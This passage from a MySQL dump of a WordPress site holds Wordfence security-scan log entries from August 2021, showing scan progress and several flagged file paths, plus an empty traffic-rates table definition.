per second'),(3167,1629374604.353559,2,'info','Scanned contents of 70 additional files at 11.87 per second'),(3168,1629374605.374774,2,'info','Scanned contents of 85 additional files at 12.29 per second'),(3169,1629374606.432637,2,'info','Scanned contents of 103 additional files at 12.91 per second'),(3170,1629374607.469057,2,'info','Scanned contents of 107 additional files at 11.87 per second'),(3171,1629374608.529451,2,'info','Scanned contents of 126 additional files at 12.51 per second'),(3172,1629374609.555282,2,'info','Scanned contents of 143 additional files at 12.89 per second'),(3173,1629374610.580895,2,'info','Scanned contents of 155 additional files at 12.78 per second'),(3174,1629374611.682844,2,'info','Scanned contents of 171 additional files at 12.93 per second'),(3175,1629374612.692941,2,'info','Scanned contents of 182 additional files at 12.78 per second'),(3176,1629374613.701329,2,'info','Scanned contents of 197 additional files at 12.92 per second'),(3177,1629374613.913310,2,'info','Scanned contents of 201 additional files at 13.00 per second'),(3178,1629374613.932495,2,'info','Asking Wordfence to check URLs against malware list.'),(3179,1629374613.954576,2,'info','Checking 357 host keys against Wordfence scanning servers.'),(3180,1629374614.761006,2,'info','Done host key check.'),(3181,1629374615.606759,2,'info','Done file contents scan'),(3182,1629374615.610767,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/brickyard/docs/assets/blueprint-css/plugins/rtl/rtl/index.php'),(3183,1629374615.634484,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/auberge/includes/plugins/smart-slider/smart-slider/index.php'),(3184,1629374615.650220,2,'info','Adding issue: File appears to be malicious or unsafe: wp-includes/vars.php'),(3185,1629374615.666889,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/css/colors/ectoplasm/0.php'),(3186,1629374615.690783,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/newsmag/assets/sass/elements/elements/index.php'),(3187,1629374615.714725,2,'info','Adding issue: File appears to be malicious or unsafe: wp-includes/class.wp-includes.php'),(3188,1629374615.748081,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/gambit/inc/widgets/roman.php'),(3189,1629374615.789610,10,'info','SUM_ENDBAD:Scanning file contents for infections and vulnerabilities'),(3190,1629374615.856859,10,'info','SUM_ENDOK:Scanning file contents for URLs on a domain blocklist'),(3191,1629374615.945782,10,'info','SUM_START:Scanning for publicly accessible quarantined files'),(3192,1629374615.990690,10,'info','SUM_ENDOK:Scanning for publicly accessible quarantined files'),(3193,1629374616.093785,10,'info','SUM_START:Scanning posts for URLs on a domain blocklist'),(3194,1629374620.130242,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(3195,1629374620.146224,2,'info','Checking 427 host keys against Wordfence scanning servers.'),(3196,1629374620.935995,2,'info','Done host key check.'),(3197,1629374620.955234,2,'info','Done examining URLs'),(3198,1629374621.266123,10,'info','SUM_ENDOK:Scanning posts for URLs on a domain blocklist'),(3199,1629374621.309644,10,'info','SUM_START:Scanning comments for URLs on a domain blocklist'),(3200,1629374621.830727,10,'info','SUM_ENDOK:Scanning comments for URLs on a domain blocklist'),(3201,1629374621.897573,10,'info','SUM_START:Scanning for weak passwords'),(3202,1629374621.931462,2,'info','Starting password strength check on 1 user.'),(3203,1629374622.046867,10,'info','SUM_ENDOK:Scanning for weak passwords'),(3204,1629374622.119695,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(3205,1629374626.421170,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(3206,1629374626.515317,10,'info','SUM_START:Scanning for admin users not created through WordPress'),(3207,1629374627.151249,10,'info','SUM_ENDOK:Scanning for admin users not created through WordPress'),(3208,1629374627.254810,10,'info','SUM_START:Scanning for suspicious site options'),(3209,1629374627.642998,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(3210,1629374627.662150,2,'info','Done examining URLs'),(3211,1629374627.967613,10,'info','SUM_ENDOK:Scanning for suspicious site options'),(3212,1629374628.065219,1,'info','-------------------'),(3213,1629374628.089609,2,'info','Wordfence used 22.82 MB of memory for scan. Server peak memory usage was: 42.82 MB'),(3214,1629374628.119330,1,'info','Scan Complete. Scanned 7831 files, 5 plugins, 38 themes, 82 posts, 0 comments and 823 URLs in 12 minutes 28 seconds.'),(3215,1629374628.141403,10,'info','SUM_FINAL:Scan complete. You have 51 new issues to fix. See below.'),(3216,1629455765.399973,10,'info','SUM_PREP:Preparing a new scan.'),(3217,1629455765.404587,1,'info','Initiating quick scan'),(3218,1629455765.456678,10,'info','SUM_START:Checking Web Application Firewall status'),(3219,1629455765.467029,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(3220,1629455765.496598,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(3221,1629455766.103828,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(3222,1629455766.117565,1,'info','-------------------'),(3223,1629455766.131933,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 20 MB'),(3224,1629455766.134872,1,'info','Quick Scan Complete. Scanned in 1 second.'),(3225,1629455766.136919,10,'info','SUM_FINAL:Scan complete. You have 34 new issues to fix. See below.'),(3226,1629542131.750298,10,'info','SUM_PREP:Preparing a new scan.'),(3227,1629542131.798170,1,'info','Initiating quick scan'),(3228,1629542131.830635,10,'info','SUM_START:Checking Web Application Firewall status'),(3229,1629542131.841199,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(3230,1629542131.897624,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(3231,1629542132.509011,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(3232,1629542132.533855,1,'info','-------------------'),(3233,1629542132.556163,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 12 MB'),(3234,1629542132.567419,1,'info','Quick Scan Complete. Scanned in 1 second.'),(3235,1629542132.580205,10,'info','SUM_FINAL:Scan complete. You have 34 new issues to fix. See below.'),(3236,1629628435.759315,10,'info','SUM_PREP:Preparing a new scan.'),(3237,1629628435.824235,1,'info','Initiating quick scan'),(3238,1629628435.871394,10,'info','SUM_START:Checking Web Application Firewall status'),(3239,1629628435.891977,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(3240,1629628435.966827,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(3241,1629628436.841740,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(3242,1629628436.889172,1,'info','-------------------'),(3243,1629628436.930697,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 4 MB'),(3244,1629628436.955439,1,'info','Quick Scan Complete. Scanned in 1 second.'),(3245,1629628436.968070,10,'info','SUM_FINAL:Scan complete. You have 34 new issues to fix. See below.'),(3246,1629633178.087622,1,'info','Scheduled Wordfence scan starting at Sunday 22nd of August 2021 11:52:58 AM'),(3247,1629633179.005840,10,'info','SUM_PREP:Preparing a new scan.'),(3248,1629633179.046559,1,'info','Contacting Wordfence to initiate scan'),(3249,1629633180.188329,10,'info','SUM_PAIDONLY:Check if your site is being Spamvertized is for paid members only'),(3250,1629633182.226787,10,'info','SUM_PAIDONLY:Checking if your IP is generating spam is for paid members only'),(3251,1629633184.241236,10,'info','SUM_PAIDONLY:Checking if your site is on a domain blocklist is for paid members only'),(3252,1629633186.406719,10,'info','SUM_START:Checking for the most secure way to get IPs'),(3253,1629633186.719508,10,'info','SUM_ENDOK:Checking for the most secure way to get IPs'),(3254,1629633186.994667,10,'info','SUM_START:Scanning to check available disk space'),(3255,1629633187.025061,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(3256,1629633187.034853,2,'info','The disk has 3463875.88 MB available'),(3257,1629633187.041530,10,'info','SUM_ENDOK:Scanning to check available disk space'),(3258,1629633187.077320,10,'info','SUM_START:Checking Web Application Firewall status'),(3259,1629633187.094516,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(3260,1629633187.138231,10,'info','SUM_START:Checking for future GeoIP support'),(3261,1629633187.152229,10,'info','SUM_ENDOK:Checking for future GeoIP support'),(3262,1629633187.189490,10,'info','SUM_START:Checking for paths skipped due to scan settings'),(3263,1629633187.220966,10,'info','SUM_ENDOK:Checking for paths skipped due to scan settings'),(3264,1629633187.255869,2,'info','Getting plugin list from WordPress'),(3265,1629633187.274202,2,'info','Found 4 plugins'),(3266,1629633187.284830,2,'info','Getting theme list from WordPress'),(3267,1629633187.329414,2,'info','Found 38 themes'),(3268,1629633188.018862,10,'info','SUM_START:Fetching core, theme and plugin file signatures from Wordfence'),(3269,1629633189.562071,10,'info','SUM_ENDSUCCESS:Fetching core, theme and plugin file signatures from Wordfence'),(3270,1629633189.631565,10,'info','SUM_START:Fetching list of known malware files from Wordfence'),(3271,1629633189.643464,10,'info','SUM_ENDSUCCESS:Fetching list of known malware files from Wordfence'),(3272,1629633189.682367,10,'info','SUM_START:Fetching list of known core files from Wordfence'),(3273,1629633189.693407,10,'info','SUM_ENDSUCCESS:Fetching list of known core files from Wordfence'),(3274,1629633189.725642,10,'info','SUM_START:Comparing core WordPress files against originals in repository'),(3275,1629633189.757609,10,'info','SUM_DISABLED:Skipping theme scan'),(3276,1629633189.772181,10,'info','SUM_DISABLED:Skipping plugin scan'),(3277,1629633189.798052,10,'info','SUM_START:Scanning for known malware files'),(3278,1629633189.830580,10,'info','SUM_START:Scanning for unknown files in wp-admin and wp-includes'),(3279,1629633189.961828,2,'info','500 files indexed'),(3280,1629633190.054919,2,'info','1000 files indexed'),(3281,1629633190.199335,2,'info','1500 files indexed'),(3282,1629633190.350479,2,'info','2000 files indexed'),(3283,1629633190.459109,2,'info','2500 files indexed'),(3284,1629633190.661706,2,'info','3000 files indexed'),(3285,1629633190.727627,2,'info','3500 files indexed'),(3286,1629633190.811524,2,'info','4000 files indexed'),(3287,1629633190.921521,2,'info','4500 files indexed'),(3288,1629633191.054132,2,'info','5000 files indexed'),(3289,1629633191.107207,2,'info','5500 files indexed'),(3290,1629633191.354702,2,'info','6000 files indexed'),(3291,1629633191.385551,2,'info','6500 files indexed'),(3292,1629633191.422280,2,'info','7000 files indexed'),(3293,1629633191.451732,2,'info','7500 files indexed'),(3294,1629633191.476239,2,'info','7831 files indexed'),(3295,1629633195.448779,2,'info','Analyzed 100 files containing 1.62 MB of data so far'),(3296,1629633200.149573,2,'info','Analyzed 200 files containing 3.19 MB of data so far'),(3297,1629633202.178287,2,'info','Analyzed 300 files containing 4.47 MB of data so far'),(3298,1629633206.114274,2,'info','Analyzed 400 files containing 7.22 MB of data so far'),(3299,1629633208.422759,2,'info','Analyzed 500 files containing 8.08 MB of data so far'),(3300,1629633211.477937,2,'info','Analyzed 600 files containing 8.93 MB of data so far'),(3301,1629633215.917553,2,'info','Analyzed 700 files containing 10.07 MB of data so far'),(3302,1629633220.343608,2,'info','Analyzed 800 files containing 11.1 MB of data so far'),(3303,1629633224.402232,2,'info','Analyzed 900 files containing 12.84 MB of data so far'),(3304,1629633227.481871,2,'info','Analyzed 1000 files containing 18.32 MB of data so far'),(3305,1629633236.505708,2,'info','Analyzed 1100 files containing 19.82 MB of data so far'),(3306,1629633239.564246,2,'info','Analyzed 1200 files containing 21.03 MB of data so far'),(3307,1629633242.641018,2,'info','Analyzed 1300 files containing 21.72 MB of data so far'),(3308,1629633245.985160,2,'info','Analyzed 1400 files containing 22.66 MB of data so far'),(3309,1629633248.995034,2,'info','Analyzed 1500 files containing 22.69 MB of data so far'),(3310,1629633252.628370,2,'info','Analyzed 1600 files containing 22.72 MB of data so far'),(3311,1629633255.761653,2,'info','Analyzed 1700 files containing 24.07 MB of data so far'),(3312,1629633258.551471,2,'info','Analyzed 1800 files containing 24.71 MB of data so far'),(3313,1629633261.656581,2,'info','Analyzed 1900 files containing 27.12 MB of data so far'),(3314,1629633264.951072,2,'info','Analyzed 2000 files containing 27.52 MB of data so far'),(3315,1629633267.534043,2,'info','Analyzed 2100 files containing 28.11 MB of data so far'),(3316,1629633270.080388,2,'info','Analyzed 2200 files containing 29.56 MB of data so far'),(3317,1629633272.293396,2,'info','Analyzed 2300 files containing 31.12 MB of data so far'),(3318,1629633275.100881,2,'info','Analyzed 2400 files containing 32.04 MB of data so far'),(3319,1629633279.104404,2,'info','Analyzed 2500 files containing 33.9 MB of data so far'),(3320,1629633282.081452,2,'info','Analyzed 2600 files containing 35.1 MB of data so far'),(3321,1629633285.367445,2,'info','Analyzed 2700 files containing 36.94 MB of data so far'),(3322,1629633288.340772,2,'info','Analyzed 2800 files containing 39.1 MB of data so far'),(3323,1629633292.029544,2,'info','Analyzed 2900 files containing 41.71 MB of data so far'),(3324,1629633297.000235,2,'info','Analyzed 3000 files containing 48.95 MB of data so far'),(3325,1629633299.169217,2,'info','Analyzed 3100 files containing 50.98 MB of data so far'),(3326,1629633301.474171,2,'info','Analyzed 3200 files containing 52.86 MB of data so far'),(3327,1629633303.955674,2,'info','Analyzed 3300 files containing 55.06 MB of data so far'),(3328,1629633308.911992,2,'info','Analyzed 3400 files containing 56.25 MB of data so far'),(3329,1629633310.990862,2,'info','Analyzed 3500 files containing 57.02 MB of data so far'),(3330,1629633313.529681,2,'info','Analyzed 3600 files containing 57.57 MB of data so far'),(3331,1629633315.768035,2,'info','Analyzed 3700 files containing 59.08 MB of data so far'),(3332,1629633318.195813,2,'info','Analyzed 3800 files containing 59.45 MB of data so far'),(3333,1629633320.810350,2,'info','Analyzed 3900 files containing 60.65 MB of data so far'),(3334,1629633323.089451,2,'info','Analyzed 4000 files containing 60.94 MB of data so far'),(3335,1629633325.317075,2,'info','Analyzed 4100 files containing 63.62 MB of data so far'),(3336,1629633328.404559,2,'info','Analyzed 4200 files containing 65.23 MB of data so far'),(3337,1629633331.288783,2,'info','Analyzed 4300 files containing 67.66 MB of data so far'),(3338,1629633334.050476,2,'info','Analyzed 4400 files containing 69.04 MB of data so far'),(3339,1629633336.977569,2,'info','Analyzed 4500 files containing 71.8 MB of data so far'),(3340,1629633340.106350,2,'info','Analyzed 4600 files containing 74.66 MB of data so far'),(3341,1629633344.140528,2,'info','Analyzed 4700 files containing 75.12 MB of data so far'),(3342,1629633345.607869,2,'info','Analyzed 4800 files containing 76.29 MB of data so far'),(3343,1629633346.937795,2,'info','Analyzed 4900 files containing 77.09 MB of data so far'),(3344,1629633349.071622,2,'info','Analyzed 5000 files containing 77.68 MB of data so far'),(3345,1629633353.082696,2,'info','Analyzed 5100 files containing 78.71 MB of data so far'),(3346,1629633356.754805,2,'info','Analyzed 5200 files containing 79.65 MB of data so far'),(3347,1629633360.346366,2,'info','Analyzed 5300 files containing 80.65 MB of data so far'),(3348,1629633363.206457,2,'info','Analyzed 5400 files containing 85.1 MB of data so far'),(3349,1629633366.279350,2,'info','Analyzed 5500 files containing 85.42 MB of data so far'),(3350,1629633368.918337,2,'info','Analyzed 5600 files containing 86.54 MB of data so far'),(3351,1629633371.671865,2,'info','Analyzed 5700 files containing 87.47 MB of data so far'),(3352,1629633373.943482,2,'info','Analyzed 5800 files containing 89.54 MB of data so far'),(3353,1629633376.616834,2,'info','Analyzed 5900 files containing 89.94 MB of data so far'),(3354,1629633377.819609,2,'info','Analyzed 6000 files containing 91.06 MB of data so far'),(3355,1629633379.843146,2,'info','Analyzed 6100 files containing 91.87 MB of data so far'),(3356,1629633381.897667,2,'info','Analyzed 6200 files containing 92.48 MB of data so far'),(3357,1629633383.446233,2,'info','Analyzed 6300 files containing 92.83 MB of data so far'),(3358,1629633385.433616,2,'info','Analyzed 6400 files containing 93.98 MB of data so far'),(3359,1629633388.005398,2,'info','Analyzed 6500 files containing 94.31 MB of data so far'),(3360,1629633392.072027,2,'info','Analyzed 6600 files containing 97.79 MB of data so far'),(3361,1629633395.713460,2,'info','Analyzed 6700 files containing 98.61 MB of data so far'),(3362,1629633398.620541,2,'info','Analyzed 6800 files containing 99.53 MB of data so far'),(3363,1629633402.050842,2,'info','Analyzed 6900 files containing 101.56 MB of data so far'),(3364,1629633405.032725,2,'info','Analyzed 7000 files containing 103.9 MB of data so far'),(3365,1629633409.896019,2,'info','Analyzed 7100 files containing 105.31 MB of data so far'),(3366,1629633413.176217,2,'info','Analyzed 7200 files containing 114.82 MB of data so far'),(3367,1629633416.282967,2,'info','Analyzed 7300 files containing 120.23 MB of data so far'),(3368,1629633420.347428,2,'info','Analyzed 7400 files containing 121.62 MB of data so far'),(3369,1629633423.086748,2,'info','Analyzed 7500 files containing 123.99 MB of data so far'),(3370,1629633427.324643,2,'info','Analyzed 7600 files containing 128.01 MB of data so far'),(3371,1629633430.416319,2,'info','Analyzed 7700 files containing 129.74 MB of data so far'),(3372,1629633433.656824,2,'info','Analyzed 7800 files containing 131.3 MB of data so far'),(3373,1629633435.359995,2,'info','Analyzed 7831 files containing 131.72 MB of data.'),(3374,1629633435.361751,10,'info','SUM_ENDBAD:Comparing core WordPress files against originals in repository'),(3375,1629633435.368814,10,'info','SUM_ENDBAD:Scanning for unknown files in wp-admin and wp-includes'),(3376,1629633435.392882,10,'info','SUM_ENDOK:Scanning for known malware files'),(3377,1629633435.407359,10,'info','SUM_START:Check for publicly accessible configuration files, backup files and logs'),(3378,1629633435.422956,10,'info','SUM_ENDOK:Check for publicly accessible configuration files, backup files and logs'),(3379,1629633435.433734,10,'info','SUM_START:Scanning file contents for infections and vulnerabilities'),(3380,1629633435.438456,10,'info','SUM_START:Scanning file contents for URLs on a domain blocklist'),(3381,1629633436.849335,2,'info','Starting scan of file contents'),(3382,1629633437.890314,2,'info','Scanned contents of 60 additional files at 57.89 per second'),(3383,1629633438.895657,2,'info','Scanned contents of 102 additional files at 49.96 per second'),(3384,1629633439.903640,2,'info','Scanned contents of 141 additional files at 46.23 per second'),(3385,1629633440.906935,2,'info','Scanned contents of 189 additional files at 46.63 per second'),(3386,1629633442.075835,2,'info','Scanned contents of 194 additional files at 37.15 per second'),(3387,1629633442.292933,2,'info','Scanned contents of 201 additional files at 36.96 per second'),(3388,1629633442.295130,2,'info','Asking Wordfence to check URLs against malware list.'),(3389,1629633442.306121,2,'info','Checking 357 host keys against Wordfence scanning servers.'),(3390,1629633443.044079,2,'info','Done host key check.'),(3391,1629633443.819929,2,'info','Done file contents scan'),(3392,1629633443.854022,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/brickyard/docs/assets/blueprint-css/plugins/rtl/rtl/index.php'),(3393,1629633443.944828,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/auberge/includes/plugins/smart-slider/smart-slider/index.php'),(3394,1629633443.981897,2,'info','Adding issue: File appears to be malicious or unsafe: wp-includes/vars.php'),(3395,1629633444.005036,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/css/colors/ectoplasm/0.php'),(3396,1629633444.057139,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/newsmag/assets/sass/elements/elements/index.php'),(3397,1629633444.076208,2,'info','Adding issue: File appears to be malicious or unsafe: wp-includes/class.wp-includes.php'),(3398,1629633444.095625,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/gambit/inc/widgets/roman.php'),(3399,1629633444.134943,10,'info','SUM_ENDBAD:Scanning file contents for infections and vulnerabilities'),(3400,1629633444.195064,10,'info','SUM_ENDOK:Scanning file contents for URLs on a domain blocklist'),(3401,1629633444.296355,10,'info','SUM_START:Scanning for publicly accessible quarantined files'),(3402,1629633444.301023,10,'info','SUM_ENDOK:Scanning for publicly accessible quarantined files'),(3403,1629633444.310733,10,'info','SUM_START:Scanning posts for URLs on a domain blocklist'),(3404,1629633445.246427,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(3405,1629633445.251224,2,'info','Checking 427 host keys against Wordfence scanning servers.'),(3406,1629633446.032856,2,'info','Done host key check.'),(3407,1629633446.058383,2,'info','Done examining URLs'),(3408,1629633446.263985,10,'info','SUM_ENDOK:Scanning posts for URLs on a domain blocklist'),(3409,1629633446.363244,10,'info','SUM_START:Scanning comments for URLs on a domain blocklist'),(3410,1629633446.633850,10,'info','SUM_ENDOK:Scanning comments for URLs on a domain blocklist'),(3411,1629633446.684770,10,'info','SUM_START:Scanning for weak passwords'),(3412,1629633446.750965,2,'info','Starting password strength check on 1 user.'),(3413,1629633446.841772,10,'info','SUM_ENDOK:Scanning for weak passwords'),(3414,1629633446.874384,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(3415,1629633450.146540,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(3416,1629633450.173474,10,'info','SUM_START:Scanning for admin users not created through WordPress'),(3417,1629633450.787738,10,'info','SUM_ENDOK:Scanning for admin users not created through WordPress'),(3418,1629633450.868103,10,'info','SUM_START:Scanning for suspicious site options'),(3419,1629633451.041891,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(3420,1629633451.052451,2,'info','Done examining URLs'),(3421,1629633451.242080,10,'info','SUM_ENDOK:Scanning for suspicious site options'),(3422,1629633451.257644,1,'info','-------------------'),(3423,1629633451.260057,2,'info','Wordfence used 22.85 MB of memory for scan. Server peak memory usage was: 42.85 MB'),(3424,1629633451.262102,1,'info','Scan Complete. Scanned 7831 files, 5 plugins, 38 themes, 82 posts, 0 comments and 823 URLs in 4 minutes 31 seconds.'),(3425,1629633451.264155,10,'info','SUM_FINAL:Scan complete. You have 51 new issues to fix. See below.'),(3426,1629714852.057150,10,'info','SUM_PREP:Preparing a new scan.'),(3427,1629714852.107682,1,'info','Initiating quick scan'),(3428,1629714852.150893,10,'info','SUM_START:Checking Web Application Firewall status'),(3429,1629714852.157627,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(3430,1629714852.212248,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(3431,1629714856.272654,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(3432,1629714856.306600,1,'info','-------------------'),(3433,1629714856.339736,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 20 MB'),(3434,1629714856.352227,1,'info','Quick Scan Complete. Scanned in 4 seconds.'),(3435,1629714856.373054,10,'info','SUM_FINAL:Scan complete. You have 34 new issues to fix. See below.'),(3436,1629801262.325349,10,'info','SUM_PREP:Preparing a new scan.'),(3437,1629801262.385528,1,'info','Initiating quick scan'),(3438,1629801262.427912,10,'info','SUM_START:Checking Web Application Firewall status'),(3439,1629801262.453049,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(3440,1629801262.535260,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(3441,1629801262.779972,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(3442,1629801262.785680,1,'info','-------------------'),(3443,1629801262.794366,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 6 MB'),(3444,1629801262.796401,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(3445,1629801262.800298,10,'info','SUM_FINAL:Scan complete. You have 34 new issues to fix. See below.');
/*!40000 ALTER TABLE `wp_wfstatus` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wftrafficrates`
--

DROP TABLE IF EXISTS `wp_wftrafficrates`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wftrafficrates` (
  `eMin` int(10) unsigned NOT NULL,
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `hitType` enum('hit','404') NOT NULL DEFAULT 'hit',
  `hits` int(10) unsigned NOT NULL,
  PRIMARY KEY (`eMin`,`IP`,`hitType`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wftrafficrates`
--

LOCK TABLES `wp_wftrafficrates` WRITE;
/*!40000 ALTER TABLE `wp_wftrafficrates` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wftrafficrates` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2023-02-01  0:06:30